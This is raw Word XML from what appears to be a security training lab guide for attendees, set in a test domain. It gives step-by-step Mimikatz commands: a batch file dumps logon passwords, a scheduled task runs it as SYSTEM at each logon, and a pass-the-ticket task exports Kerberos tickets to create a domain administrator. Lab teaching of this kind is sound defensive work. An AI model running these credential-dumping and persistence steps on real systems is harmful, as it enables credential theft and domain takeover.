            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6138237D" w14:textId="77777777" w:rsidR="00097904" w:rsidRPr="00C6425D" w:rsidRDefault="00097904" w:rsidP="00097904">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:bookmarkStart w:id="30" w:name="_Hlk524011739"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>c:\hack\mimikatz_trunk\x64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B65132" w14:textId="77777777" w:rsidR="00097904" w:rsidRPr="00C6425D" w:rsidRDefault="00097904" w:rsidP="00097904">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>echo %DATE% %TIME% &gt;&gt;sniffer.log</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="30"/>
          <w:p w14:paraId="0A55BC64" w14:textId="77777777" w:rsidR="00097904" w:rsidRPr="00C6425D" w:rsidRDefault="00097904" w:rsidP="00097904">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">mimikatz.exe </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>privilege::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">debug </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sekurlsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>logonpasswords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> exit &gt;&gt;sniffer.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258780A7" w14:textId="1628F7E9" w:rsidR="00097904" w:rsidRDefault="00097904" w:rsidP="00097904">
            <w:r w:rsidRPr="00C6425D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>rem pause</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34000D39" w14:textId="77777777" w:rsidR="00097904" w:rsidRDefault="00097904" w:rsidP="00416A9B"/>
    <w:p w14:paraId="1C349C4E" w14:textId="1469931F" w:rsidR="009B5DFF" w:rsidRDefault="009B5DFF" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then create a scheduled task to run the sniffer.bat at each logon event:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC22F0" w14:paraId="0A1D5D10" w14:textId="77777777" w:rsidTr="00DC22F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="084CEC99" w14:textId="4F577805" w:rsidR="00DC22F0" w:rsidRDefault="00DC22F0" w:rsidP="00416A9B">
            <w:r w:rsidRPr="009B5DFF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SCHTASKS /Create /TN Sniffer /SC ONEVENT /EC Security /MO "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009B5DFF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>EventID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009B5DFF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>=4624)]]" /TR "c:\hack\mimikatz_trunk\x64\sniffer.bat" /RU "NT AUTHORITY\SYSTEM" /RL HIGHEST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EDE9796" w14:textId="77777777" w:rsidR="009B5DFF" w:rsidRPr="009B5DFF" w:rsidRDefault="009B5DFF" w:rsidP="00416A9B"/>
    <w:p w14:paraId="138B3CD4" w14:textId="16F98BD2" w:rsidR="00BA1443" w:rsidRDefault="00BA1443" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open session on VICTIM-PC using this domain account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA94517" w14:textId="77777777" w:rsidR="00BA1443" w:rsidRPr="001D59B0" w:rsidRDefault="00BA1443" w:rsidP="00BA1443">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Domain: CONTOSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC6668" w14:textId="77777777" w:rsidR="00BA1443" w:rsidRPr="001D59B0" w:rsidRDefault="00BA1443" w:rsidP="00BA1443">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Account: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>jdoe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B81A8ED" w14:textId="77777777" w:rsidR="00BA1443" w:rsidRPr="001D59B0" w:rsidRDefault="00BA1443" w:rsidP="00BA1443">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>the password you found in previous step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53233875" w14:textId="0939C789" w:rsidR="00FC5C1B" w:rsidRDefault="00FC5C1B" w:rsidP="009B5DFF"/>
    <w:p w14:paraId="2AFC4B44" w14:textId="33B39A9A" w:rsidR="00924990" w:rsidRDefault="00703E4F" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Once session open</w:t>
      </w:r>
      <w:r w:rsidR="00924990">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B37F32" w14:textId="77777777" w:rsidR="00AA075F" w:rsidRDefault="00AA075F" w:rsidP="00703E4F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start SCCM service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A87CE2" w14:textId="34763947" w:rsidR="00FC5C1B" w:rsidRDefault="00703E4F" w:rsidP="00703E4F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>edit file c:\hack\mimikatz_trunk\x64\sniffer.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36803302" w14:textId="77777777" w:rsidR="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB327AA" w14:textId="720F2610" w:rsidR="00AA075F" w:rsidRDefault="00DC22F0" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look at accounts and try to find explicit passwords and accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34324B" w14:textId="77777777" w:rsidR="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3810C62B" w14:textId="5A9754DC" w:rsidR="009B1478" w:rsidRDefault="007A4C94" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check account privileges: what are the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sccm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> agent group membership?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D470C" w14:textId="7A9F5BE7" w:rsidR="00CD3CF8" w:rsidRDefault="00CD3CF8" w:rsidP="00C6425D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pP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CD3CF8" w14:paraId="0942895B" w14:textId="77777777" w:rsidTr="003C3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5BDB5B18" w14:textId="77777777" w:rsidR="00CD3CF8" w:rsidRDefault="00CD3CF8" w:rsidP="003C38D6">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD3CF8" w14:paraId="4D8F107B" w14:textId="77777777" w:rsidTr="003C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FEDDC7" w14:textId="1874F10A" w:rsidR="00CD3CF8" w:rsidRDefault="00CD3CF8">
            <w:bookmarkStart w:id="31" w:name="_Hlk524106969"/>
            <w:r>
              <w:t>Who is the account name member of the Domain Admins group</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45770">
              <w:t>?</w:t>
            </w:r>
            <w:bookmarkEnd w:id="31"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45BB3717" w14:textId="77777777" w:rsidR="00CD3CF8" w:rsidRDefault="00CD3CF8" w:rsidP="00703E4F"/>
    <w:p w14:paraId="18E1C302" w14:textId="15D0C883" w:rsidR="00FD5A5D" w:rsidRDefault="00FD5A5D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD8002" w14:textId="63D017A6" w:rsidR="00FD5A5D" w:rsidRPr="009B5DFF" w:rsidRDefault="00FD5A5D" w:rsidP="00FD5A5D">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Hlk524107062"/>
      <w:bookmarkStart w:id="33" w:name="_Toc44075684"/>
      <w:r w:rsidRPr="009B5DFF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5DFF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>use pass the ticket to create a domain administrator account</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:p w14:paraId="05A905B0" w14:textId="469E4B60" w:rsidR="00FC5C1B" w:rsidRDefault="002E7D8E" w:rsidP="009B5DFF">
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In this part attendees will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Pass the Ticket to create a domain administrator account</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9748DA" w14:textId="60EEE91A" w:rsidR="00DC22F0" w:rsidRDefault="00DC22F0" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open session on VICTIM-PC using this domain account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE83D6C" w14:textId="77777777" w:rsidR="009B5DFF" w:rsidRPr="001D59B0" w:rsidRDefault="009B5DFF" w:rsidP="009B5DFF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Domain: CONTOSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278936DF" w14:textId="3A8F0ABF" w:rsidR="009B5DFF" w:rsidRPr="001D59B0" w:rsidRDefault="009B5DFF" w:rsidP="009B5DFF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Account: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>jdoe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="560ACC4C" w14:textId="350B56CF" w:rsidR="009B5DFF" w:rsidRPr="001D59B0" w:rsidRDefault="009B5DFF" w:rsidP="009B5DFF">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>the password you found in previous step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C63E9" w14:textId="77777777" w:rsidR="009B5DFF" w:rsidRPr="009B5DFF" w:rsidRDefault="009B5DFF" w:rsidP="00416A9B"/>
    <w:p w14:paraId="3737854E" w14:textId="203C61B8" w:rsidR="009B5DFF" w:rsidRDefault="00E973DF" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and run commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBFFA56" w14:textId="77777777" w:rsidR="00E973DF" w:rsidRPr="003C38D6" w:rsidRDefault="00E973DF" w:rsidP="003C38D6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>Cd \Hack\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mimikatz_trunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF3AB40" w14:textId="77777777" w:rsidR="00E973DF" w:rsidRPr="003C38D6" w:rsidRDefault="00E973DF" w:rsidP="003C38D6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>Mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21FAFF" w14:textId="4D7E4AB3" w:rsidR="00E973DF" w:rsidRPr="003C38D6" w:rsidRDefault="00E973DF" w:rsidP="003C38D6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010483EE" w14:textId="77777777" w:rsidR="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="003C38D6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E0C16B" w14:textId="49EC679D" w:rsidR="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start SCCM service.</w:t>
      </w:r>
      <w:r w:rsidR="004C7642">
        <w:t xml:space="preserve"> Note</w:t>
      </w:r>
      <w:r w:rsidR="00E518E7">
        <w:t xml:space="preserve">: you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E518E7">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E518E7">
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E518E7">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E518E7">
        <w:t xml:space="preserve"> command while SCCM service is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E518E7">
        <w:t>stating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E518E7">
        <w:t xml:space="preserve"> to ensure you have Kerberos ticket for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E518E7">
        <w:t>sccmagent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E518E7">
        <w:t xml:space="preserve">. Otherwise repeat steps 3 and 4 until you can see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E518E7">
        <w:t>sccmagent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E518E7">
        <w:t xml:space="preserve"> ticket in exported list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E11F5CA" w14:textId="77777777" w:rsidR="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E072316" w14:textId="7B7B5723" w:rsidR="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Back in elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) run commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605B5863" w14:textId="250BC3B4" w:rsidR="003C38D6" w:rsidRPr="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="00E973DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF886E" w14:textId="34480EAF" w:rsidR="009B5DFF" w:rsidRDefault="002576B5" w:rsidP="00416A9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9B315F" wp14:editId="1BC3740E">
            <wp:extent cx="3156221" cy="2833687"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5080"/>
            <wp:docPr id="26" name="Image 26" descr="Texte de remplacement généré par une machine :&#10;mimikatz 2.1.1 x64 (oe.eo) &#10;imikatz # sekurlsa: : tickets 'export &#10;uthentication Id &#10;Session &#10;User Name &#10;Doma i n &#10;Logon Server &#10;Logon Time &#10;SID &#10;* Username &#10;* Domain &#10;* Password &#10;e ; 213748 (eeøøøøøø:B0342f4) &#10;Remotelnteractive from 2 &#10;j doe &#10;CONTOSO &#10;VICTIM-DC &#10;9/5/2818 8:44:47 AM &#10;s-1-5-21-921156165-37041658-498273695-1185 &#10;j doe &#10;CONTOSO . LAB &#10;(null) &#10;Group &#10;Group 1 &#10;Group 2 &#10;uthentication Id &#10;Session &#10;User Name &#10;Doma i n &#10;Logon Server &#10;Logon Time &#10;Ticket Granting Service &#10;Client Ticket ? &#10;Ticket Granting Ticket &#10;e ; 213566 (eeeeeøee:eeB3423e) &#10;Remotelnteractive from 2 &#10;j doe &#10;CONTOSO &#10;VICTIM-DC &#10;9/5/2818 8:44:47 AM &#10;s-1-5-21-921156165-37041658-498273695-11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mimikatz 2.1.1 x64 (oe.eo) &#10;imikatz # sekurlsa: : tickets 'export &#10;uthentication Id &#10;Session &#10;User Name &#10;Doma i n &#10;Logon Server &#10;Logon Time &#10;SID &#10;* Username &#10;* Domain &#10;* Password &#10;e ; 213748 (eeøøøøøø:B0342f4) &#10;Remotelnteractive from 2 &#10;j doe &#10;CONTOSO &#10;VICTIM-DC &#10;9/5/2818 8:44:47 AM &#10;s-1-5-21-921156165-37041658-498273695-1185 &#10;j doe &#10;CONTOSO . LAB &#10;(null) &#10;Group &#10;Group 1 &#10;Group 2 &#10;uthentication Id &#10;Session &#10;User Name &#10;Doma i n &#10;Logon Server &#10;Logon Time &#10;Ticket Granting Service &#10;Client Ticket ? &#10;Ticket Granting Ticket &#10;e ; 213566 (eeeeeøee:eeB3423e) &#10;Remotelnteractive from 2 &#10;j doe &#10;CONTOSO &#10;VICTIM-DC &#10;9/5/2818 8:44:47 AM &#10;s-1-5-21-921156165-37041658-498273695-1185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5913" cy="2842389"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E37E7EB" w14:textId="77777777" w:rsidR="002576B5" w:rsidRDefault="002576B5" w:rsidP="00416A9B"/>
    <w:p w14:paraId="1E8C2ABC" w14:textId="7FED0879" w:rsidR="003C38D6" w:rsidRPr="009B5DFF" w:rsidRDefault="003C38D6" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look at folder </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\Hack\mimikatz_trunk\x64</w:t>
